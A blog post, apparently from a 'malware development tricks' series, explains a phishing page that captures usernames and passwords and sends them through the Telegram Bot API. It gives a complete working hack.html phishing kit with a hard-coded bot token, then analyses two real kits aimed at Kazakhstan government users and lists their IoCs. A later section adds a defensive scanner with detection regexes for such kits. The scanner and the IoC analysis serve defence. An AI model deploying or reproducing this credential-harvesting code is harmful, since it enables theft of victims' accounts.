Malware development trick 50: phishing attack using a fake login page with Telegram exfiltration. Simple Javascript example.
﷽
Hello, cybersecurity enthusiasts and white hackers!
tLab Technologies recently uncovered what is, to our knowledge, one of the first phishing campaigns of this kind in Kazakhstan, aimed at one of its clients. The method itself is not new: data exfiltration through legitimate services is used by many threat actors, but the professional quality of the phishing page is notable. To an ordinary, inexperienced user everything looks entirely legitimate.
Phishing attacks remain one of the most prominent methods for cybercriminals to steal sensitive data. In this post, we’ll break down how a malicious HTML page can be crafted to steal user credentials via a fake login page, using Telegram as the communication channel to exfiltrate the stolen data. We’ll also explore how such an attack could work in practice with a Proof of Concept (PoC).
the attack: fake login page and Telegram bot integration
The attack starts with a fake login page that looks identical to a legitimate website. When a victim enters their credentials (username and password), the data is captured by malicious JavaScript running in the background and sent to the attacker via a Telegram bot using the Telegram Bot API.
practical example
In this section, we'll look at how a malicious HTML page can be used to collect user credentials and exfiltrate the data via the Telegram Bot API. The page contains a fake login form designed to look like a legitimate site. Once the victim enters their credentials (username and password), the data is captured by JavaScript and sent to the attacker via a Telegram bot.
First of all, the HTML page contains a login form where the user is prompted to enter their username and password:
<div class="login-form">
<h2>Login to Your Account</h2>
<form id="loginForm" action="javascript:void(0);">
<input type="text" id="username" name="username" placeholder="Username" required>
<input type="password" id="password" name="password" placeholder="Password" required>
<button type="submit">Login</button>
</form>
</div>
The form doesn’t submit the data normally. Instead, it is intercepted by JavaScript:
document.getElementById('loginForm').addEventListener('submit', function(event) {
event.preventDefault(); // prevent actual form submission
var username = document.getElementById('username').value;
var password = document.getElementById('password').value;
// prepare the payload with stolen data
var payload = `Username: ${username}\nPassword: ${password}`;
// send stolen data to Telegram
sendToTelegram(payload);
});
As you can see, the logic is pretty simple: when the user clicks Login, the JavaScript handler captures the entered username and password. The data is then packaged into a plain-text message:
var payload = `Username: ${username}\nPassword: ${password}`;
The captured credentials are sent to the Telegram bot with a simple POST request to the Bot API's sendMessage method (the bot token and chat ID are hard-coded in the page, which is also what makes such kits easy to fingerprint):
function sendToTelegram(message) {
var chatId = '5547299598'; // chat id for Telegram bot
var botToken = '7725786727:AAEuylKfQgTg5RBMeXwyk9qKhcV5kULP_po'; // Telegram bot API token
var apiUrl = `https://api.telegram.org/bot${botToken}/sendMessage`;
var xhr = new XMLHttpRequest();
xhr.open("POST", apiUrl, true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
// prepare the POST data in the proper format
var postData = `chat_id=${chatId}&text=${encodeURIComponent(message)}`;
// send the POST request with the message
xhr.send(postData);
}
How it works?
- the user enters credentials on the fake login page.
- JavaScript intercepts the form submission and collects the data.
- the data is sent to the Telegram bot through a Bot API call.
- the attacker can now read the stolen credentials in the Telegram chat.
So, the full source code (hack.html) looks like this:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Login - Meow Hacking Portal</title>
<style>
body {
font-family: Arial, sans-serif;
background: linear-gradient(to right, #00c6ff, #0072ff); /* Smooth blue gradient */
padding: 20px;
height: 100vh;
display: flex;
justify-content: center;
align-items: center;
}
.login-form {
background-color: #fff;
padding: 30px;
border-radius: 8px;
box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
width: 300px;
}
.login-form input {
width: 100%;
padding: 10px;
margin: 10px 0;
border: 1px solid #ccc;
border-radius: 5px;
}
.login-form button {
padding: 10px 20px;
background-color: #007bff;
color: white;
border: none;
border-radius: 5px;
cursor: pointer;
}
.login-form button:hover {
background-color: #0056b3;
}
</style>
</head>
<body>
<div class="login-form">
<h2>Login to Meow Hacking Portal</h2>
<form id="loginForm" action="javascript:void(0);">
<input type="text" id="username" name="username" placeholder="Username" required>
<input type="password" id="password" name="password" placeholder="Password" required>
<button type="submit">Login</button>
</form>
</div>
<script>
document.getElementById('loginForm').addEventListener('submit', function(event) {
event.preventDefault(); // Prevent actual form submission
var username = document.getElementById('username').value;
var password = document.getElementById('password').value;
// Prepare the payload with stolen data
var payload = `Username: ${username}\nPassword: ${password}. Meow ♥️\uFE0F`;
// Send stolen data to Telegram
sendToTelegram(payload);
});
function sendToTelegram(message) {
var chatId = '5547299598'; // chat id for Telegram bot
var botToken = '7725786727:AAEuylKfQgTg5RBMeXwyk9qKhcV5kULP_po'; // Telegram bot API token
var apiUrl = `https://api.telegram.org/bot${botToken}/sendMessage`;
var xhr = new XMLHttpRequest();
xhr.open("POST", apiUrl, true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
// prepare the POST data in the proper format
var postData = `chat_id=${chatId}&text=${encodeURIComponent(message)}`;
// send the POST request with the message
xhr.send(postData);
}
</script>
</body>
</html>
demo
Let's see everything in action. First of all, open our simple fake login page:
Now, when a user submits their credentials in the fake login form:
the credentials will be sent to a Telegram bot via the POST request:
As you can see, everything works perfectly! =^..^=!
phishing in the wild
tLab Technologies detected such an attack against one of its clients in the Kazakhstan public sector.
In this case we found another fake login page:
This file is also a piece of JavaScript-based phishing combined with a fake login form. It collects user credentials (email and password) and sends them to an external service. The form's submit handler sends the credentials with fetch() to the Telegram Bot API, so the attacker receives them in a Telegram chat.
Let’s break down the Cyber Kill Chain stages based on this file.
targeting the victim - the file is crafted for credential harvesting from users, likely people who are trying to access government-related resources such as ***.****.gov.kz.
information gathering - the attacker may already have data (e.g., email addresses) and is crafting the phishing page accordingly.
weaponisation - as you can see, the file itself is the weapon. It contains malicious JavaScript that facilitates the credential-stealing attack. The form is designed to look legitimate, leveraging social engineering tactics.
delivery - the malicious page is delivered through a phishing email (the user receives a link to the page, apparently from a legitimate source such as the government) or through a malicious link shared on social media or on malicious websites.
exploitation - the exploitation happens when the user enters their credentials into the form, believing it to be legitimate. The page exploits the user’s trust by mimicking a known official website.
command and control (C2) - the Telegram Bot API is used as a covert C2 channel. The credentials are sent in real time to a Telegram chat, which the attacker monitors to collect and use the stolen data.
actions on objectives - with the stolen credentials, the attacker can access the victim's accounts.
So, the targeted brand is one of the Kazakhstan ministries (***.***.gov.kz), or its suppliers via a lure impersonating the Government of the Republic of Kazakhstan.
User Interface Deception
- pre-filled email: shows ***@***.***.gov.kz
- message: Подтвердите свой почтовый ящик, чтобы получить доступ к файлу (Confirm your mailbox to access the file)
- fake security note: Примечание: файл защищен системой безопасности ***.***.gov.kz (Note: the file is protected by the ***.***.gov.kz security system)
IoCs
network
- telegram bot API token: 7527440371:AAGIaR_ObbDwitbGuKLl4bH_qMt6TnGpuTY
- background image: https://firebasestorage.googleapis.com/v0/b/project-a29a7.appspot.com/o/backphoto3.jpg?alt=media&token=dfd11e8a-3b48-4da0-b3dd-ea852a87922b
- telegram chat ID: 6516482987
Let's upload this to tLab Anti-APT:
Since the form submission is intercepted by JavaScript and nothing is visibly loaded afterwards, the sandbox takes detailed screenshots of the phishing page to record and analyze any changes. In our case it discovered that the page does not update after the credentials are submitted:
phishing in the wild 2
Another interesting file with similar logic was also found.
File title: Спецификация (Russian for Specification)
The malware is a static HTML file containing a phishing form that leverages legitimate third-party services for credential collection and post-submit redirection. The code uses a table-based layout with embedded styling and form-submission logic.
File: 7ee39d2572f161d4c94bb06bda5bea229d39dc869808ad5f5d110964aa470071.html
What it does?
- a static phishing form with a blurred background; it posts the credentials to submit-form.com and then redirects to a legitimate Microsoft support page so that the submission appears successful.
- the pre-filled victim email suggests a targeted spearphish:
- the background image is embedded as a base64 string:
IoCs
- file SHA-256 hash: 7ee39d2572f161d4c94bb06bda5bea229d39dc869808ad5f5d110964aa470071
- contains a base64-encoded string (the embedded background image)
network indicators:
- collection endpoint: https://submit-form.com/On59mco96
- hidden redirect URL: https://support.microsoft.com/EN-EN/onedrive
In all of these cases tLab Anti-APT used a unique combination of analysis methods: relevant text and email addresses extracted via OCR from the rendered content of executables and HTML pages, comparison with email data, and Telegram API token detection.
Note: all of this is analyzed automatically, without user interaction.
Thank you tLab for your API ♥️!
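A static check a defender can run over kits like the three above, added here as an example and not code from the original post or from tLab: it scans an HTML file for the indicators discussed in the PoC and in both in-the-wild cases, namely a hard-coded Telegram bot token and chat ID, calls to api.telegram.org, a submit handler that calls preventDefault() and then an exfiltration API, a form posting to a third-party form collector such as submit-form.com, a pre-filled victim email, and a hidden post-submit redirect. The token regex follows the public "digits:35 characters" shape of Bot API tokens; the collector host list, the `_redirect` hidden field, the scoring weights and the verdict threshold are my assumptions, and the three sample pages are constructed for the example (the token, chat ID, endpoint and email in them are not real).

```javascript
// Added example (not from the original post or from tLab): a dependency-free static
// scanner for HTML phishing kits of the kinds shown above. Run with: node scan.js

// Telegram Bot API tokens have the shape "<8-10 digits>:<35 chars of [A-Za-z0-9_-]>".
const TELEGRAM_TOKEN_RE = /\b\d{8,10}:[A-Za-z0-9_-]{35}\b/g;
// chat_id=123..., chatId = '123...', "chat_id": 123... (only literal numeric IDs)
const CHAT_ID_RE = /chat_?id\s*[:=]\s*['"`]?(-?\d{6,})/gi;
const URL_RE = /https?:\/\/[^\s"'`<>)]+/gi;                 // every absolute URL in the file
const FORM_ACTION_RE = /<form\b[^>]*\baction\s*=\s*["']([^"']*)["']/gi;
// Assumption: form-backend services take the post-submit redirect from a hidden
// "_redirect" field; a <meta http-equiv="refresh"> is the other common variant.
const HIDDEN_REDIRECT_RE = /<input\b[^>]*name\s*=\s*["']_redirect["'][^>]*value\s*=\s*["']([^"']+)["']/gi;
const META_REFRESH_RE = /<meta\b[^>]*http-equiv\s*=\s*["']refresh["'][^>]*url=([^"'>\s]+)/gi;
const PREFILLED_EMAIL_RE = /<input\b[^>]*\bvalue\s*=\s*["']([^"'\s@]+@[^"'\s]+)["']/gi;
const INTERCEPT_RE = /\.preventDefault\s*\(/;               // submit handler swallows the real submit
const EXFIL_CALL_RE = /\b(XMLHttpRequest|fetch|navigator\.sendBeacon)\b/;
// Assumption: third-party form backends seen abused as credential collectors.
const FORM_COLLECTOR_HOSTS = ['submit-form.com', 'formspree.io', 'getform.io', 'formsubmit.co'];

function hostOf(url) {
  try { return new URL(url).hostname.toLowerCase(); } catch { return ''; }
}

// Collect every match of a /g regex (first capture group if present, else the whole match).
function allMatches(re, text) {
  re.lastIndex = 0;
  const out = [];
  let m;
  while ((m = re.exec(text)) !== null) out.push(m[1] !== undefined ? m[1] : m[0]);
  return out;
}

function scanPhishingKit(html) {
  const tokens = [...new Set(allMatches(TELEGRAM_TOKEN_RE, html))];
  const chatIds = [...new Set(allMatches(CHAT_ID_RE, html))];
  const urls = [...new Set(allMatches(URL_RE, html))];
  const telegramApi = urls.filter((u) => hostOf(u) === 'api.telegram.org');
  const collectors = urls.filter((u) => FORM_COLLECTOR_HOSTS.includes(hostOf(u)));
  const formActions = allMatches(FORM_ACTION_RE, html);
  const redirects = [...allMatches(HIDDEN_REDIRECT_RE, html), ...allMatches(META_REFRESH_RE, html)];
  const prefilledEmails = allMatches(PREFILLED_EMAIL_RE, html);
  const interceptsSubmit = INTERCEPT_RE.test(html) && EXFIL_CALL_RE.test(html);
  const noopAction = formActions.some((a) => /^javascript:/i.test(a) || a === '#' || a === '');

  // Weights and threshold are assumptions chosen so that either exfil path alone is enough.
  const findings = [];
  let score = 0;
  if (tokens.length) { score += 3; findings.push(`telegram bot token: ${tokens.join(', ')}`); }
  if (telegramApi.length) { score += 2; findings.push('calls api.telegram.org'); }
  if (chatIds.length) { score += 1; findings.push(`telegram chat id: ${chatIds.join(', ')}`); }
  if (collectors.length) { score += 3; findings.push(`posts to form collector: ${collectors.join(', ')}`); }
  if (interceptsSubmit) { score += 2; findings.push('submit handler calls preventDefault() and an exfil API'); }
  if (noopAction) { score += 1; findings.push('form action is a no-op (javascript:/#), data leaves via script'); }
  if (prefilledEmails.length) { score += 1; findings.push(`pre-filled victim email: ${prefilledEmails.join(', ')}`); }
  if (redirects.length) { score += 1; findings.push(`post-submit redirect to: ${redirects.join(', ')}`); }

  return { score, verdict: score >= 4 ? 'phishing-kit' : 'clean',
           tokens, chatIds, telegramApi, collectors, prefilledEmails, redirects, findings };
}

// Constructed samples (not the real files): a Telegram-exfil kit, a form-collector kit, a benign login.
const SAMPLE_TELEGRAM_KIT = `<!DOCTYPE html><html><body>
<form id="loginForm" action="javascript:void(0);">
  <input type="text" id="username" placeholder="Username" required>
  <input type="password" id="password" placeholder="Password" required>
  <button type="submit">Login</button>
</form>
<script>
document.getElementById('loginForm').addEventListener('submit', function (e) {
  e.preventDefault();
  var chatId = '1000000001';
  var botToken = '1234567890:AAExampleTokenForTests_1234567890ab';
  var xhr = new XMLHttpRequest();
  xhr.open('POST', 'https://api.telegram.org/bot' + botToken + '/sendMessage', true);
  xhr.send('chat_id=' + chatId + '&text=' + encodeURIComponent(document.getElementById('password').value));
});
</script></body></html>`;

const SAMPLE_COLLECTOR_KIT = `<!DOCTYPE html><html><body>
<form action="https://submit-form.com/EXAMPLEID" method="POST">
  <input type="hidden" name="_redirect" value="https://support.microsoft.com/EN-EN/onedrive">
  <input type="email" name="email" value="victim@example.gov.kz" readonly>
  <input type="password" name="password" placeholder="Password" required>
  <button type="submit">Open file</button>
</form></body></html>`;

const SAMPLE_BENIGN = `<form action="/login" method="POST">
  <input type="text" name="username"><input type="password" name="password">
  <button type="submit">Login</button></form>`;

for (const [name, html] of Object.entries({ telegramKit: SAMPLE_TELEGRAM_KIT,
                                             collectorKit: SAMPLE_COLLECTOR_KIT,
                                             benignLogin: SAMPLE_BENIGN })) {
  const r = scanPhishingKit(html);
  console.log(`${name}: ${r.verdict} (score ${r.score})`);
  for (const f of r.findings) console.log(`  - ${f}`);
}
```

Because the scan is purely textual it works on a file pulled from a mail gateway or a sandbox before anything is rendered; the same regexes can be dropped into a YARA rule or a mail-filter hook. It will not see tokens that are assembled at runtime or fetched from a second-stage script, which is why the screenshot-based check the sandbox performs above (no visible page change after submit) is still a useful complement.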
conclusion
These pages represent a credential-harvesting campaign with more than one exfiltration method and professional social engineering. The use of legitimate services (Telegram Bot API, Firebase storage, submit-form.com) for exfiltration and hosting lets the traffic blend in with ordinary web activity, which is what makes it effective at evading simple network controls. Organizations should combine user education, technical controls, and continuous monitoring to detect and prevent similar attacks.
tLab technologies
Telegram Bot API stealer
source code in Github
This is a practical case for educational purposes only.
Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine